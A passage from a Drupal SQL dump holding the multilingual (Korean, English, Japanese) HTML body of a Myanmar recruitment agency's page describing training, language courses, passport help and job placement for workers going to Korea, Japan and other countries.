style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp;6. &nbsp;두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사람들을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기본</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">과정과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요하는 &nbsp; &nbsp; &nbsp; &nbsp; 경우에&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">컴퓨터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">많은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">과정들과 연결하고 취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를 하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; 7. 상기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\">&nbsp; </span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">IRIS(International Recruitment Integrity System)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">윤리적</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">채용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공정한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노동</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관행 &nbsp; &nbsp; &nbsp; 의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">마련하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공합니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 24, 195, 'en', 0, '<p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 24, 195, 'ja', 0, '<p class=\"MsoNormal\">1.&nbsp;<span style=\"mso-spacerun:yes;\"> </span><span lang=\"JA\">ニューコメットトレンディグエイジェンシーでは韓国の造船所で</span>E 7-3 Visa<span lang=\"JA\">で働きたいミャンマー全国から民族 &nbsp; &nbsp; &nbsp;問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介 &nbsp; &nbsp; &nbsp;をしております。</span><o:p></o:p></p><p class=\"MsoNormal\">2. <span lang=\"JA\">海外に勤める際使えるそれぞれの国の言葉が勉強できる学校も開いております。</span>(<span lang=\"JA\">現在日本語学校、韓国語学校</span>)<o:p></o:p></p><p class=\"MsoNormal\">3 .<span lang=\"JA\">パスポート作成サービス</span><o:p></o:p></p><p class=\"MsoNormal\">4. <span lang=\"JA\">日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp; &nbsp; &nbsp; &nbsp;取り込んでおります。</span><o:p></o:p></p><p>5.<span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT,<span style=\"mso-spacerun:yes;\">&nbsp;</span>NAT-TEST, TOP-J)<span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">の</span>N3,N2<span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">以上の合格者達にはワークビザである</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">通訳、翻訳</span><o:p></o:p></p><p>• IT<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">事業</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">エンジニアに関する事業</span><span style=\"mso-spacerun:yes;\">&nbsp;</span>(Civil,Mechanical,EP,EC,Auto Card<span style=\"font-family:&quot;MS Gothic&quot;;mso-bidi-font-family:&quot;MS Gothic&quot;;\">など</span>)<o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">介護関係</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;mso-fareast-language:JA;\" lang=\"JA\">実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">車修理関係</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">工業関係</span><o:p></o:p></p><p>• &nbsp;<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">建築業関係</span><o:p></o:p></p><p>• &nbsp;<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">食品関係</span><o:p></o:p></p><p>• &nbsp;<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">レストラン</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">ホテル関係</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">衣類関係</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">農業関係</span><o:p></o:p></p><p>&nbsp;•<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">漁業関係の工場</span><o:p></o:p></p><p>&nbsp;•<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">介護関係&nbsp;</span><span style=\"font-family:&quot;MS Mincho&quot;;font-size:9.5pt;mso-bidi-font-family:&quot;MS Mincho&quot;;mso-bidi-font-size:10.0pt;\">{Training Visa)</span><o:p></o:p><o:p></o:p></p><p class=\"MsoNormal\">6.<span lang=\"JA\">ドバイ、マレーシア、シンガポール、タインなどで働きたい学生達のためにも英語など必要な場合に応じて、パ &nbsp; &nbsp;ソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビ &nbsp; &nbsp; &nbsp; ースをしております。</span><o:p></o:p></p><p><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">7. &nbsp;</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">上記のサービスを</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">International Recruitment Integrity System(IRIS)</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">が定めた</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">Ethical Recruitment and Fair Labour Practices</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">に &nbsp; &nbsp; &nbsp;合った基準で管理しております。</span></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 24, 195, 'ko', 0, '<ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 한국 조선소에서</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> E-7-3 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">용접공</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">방문에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(PJ)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 외국에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일할 때 직장에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어려움을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">겪지</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">않도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직장에 사용하는 기본</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">한국어</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun 